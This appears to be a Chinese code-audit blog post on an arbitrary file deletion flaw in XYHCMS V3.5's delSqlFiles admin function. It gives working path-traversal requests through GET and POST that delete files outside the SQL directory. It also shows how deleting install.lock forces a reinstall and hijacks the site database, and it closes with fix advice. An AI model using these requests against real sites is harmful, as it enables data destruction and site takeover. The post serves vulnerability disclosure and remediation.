【代码审计】XYHCMS V3.5任意文件删除漏洞分析

 

0x00 环境准备

XYHCMS官网：http://www.xyhcms.com/

网站源码版本：XYHCMS V3.5（2017-12-04 更新）

程序源码下载：http://www.xyhcms.com/Show/download/id/2/at/0.html

测试网站首页：

0x01 代码分析

1、漏洞文件位置：/App/Manage/Controller/DatabaseController.class.php   第293--233行：

1. public function delSqlFiles() {
2. $id        = I('id', 0, 'intval');
3. $batchFlag = I('get.batchFlag', 0, 'intval');
4. //批量删除
5. if ($batchFlag) {
6. $files = I('key', array());
7. } else {
8. $files[] = I('sqlfilename', '');
9. }
10. 10.         if (empty($files)) {
11. 11.             $this->error('请选择要删除的sql文件');
12. 12.         }
13. 13.         foreach ($files as $file) {
14. 14.             unlink($this->getDbPath() . '/' . $file);
15. 15.         }
16. 16.         $this->success("已删除：" . implode(",", $files), U('Database/restore'));
17. 17.     }

这段函数中对提交的参数进行简单的判断，然后将接受的参数拼接到路径中，带入到unlink函数中进行删除，导致程序在实现上存在任意文件删除漏洞，攻击者可通过该漏洞删除任意文件，如删除install.lock进行CMS重装，劫持网站

数据库。

0x02 漏洞利用

1、在网站根目录新建1.txt作为漏洞测试文件

2、进行漏洞利用

漏洞利用方式一：

通过GET方式提交参数，删除根目录下的1.txt文件

http://127.0.0.1/xyhai.php?s=/Database/delSqlFiles/sqlfilename/..\\..\\..\\1.txt/tm/1

漏洞利用方式二：

通过POST提交参数，删除根目录下的1.txt文件

http://127.0.0.1/xyhai.php?s=/Database/delSqlFiles/batchFlag/1

POST:key%5B%5D=../../../1.txt

3、如何进一步利用呢？

删除\Install\install.lock，进行CMS重装，劫持网站数据库。删除install.lock文件，访问http://127.0.0.1/install/，成功进入系统重装界面。

0x03 修复建议

1、过滤..，用来防止目录跳转

2、对要删除的文件名进行严格限制

最后

欢迎关注个人微信公众号：Bypass--，每周原创一篇技术干货。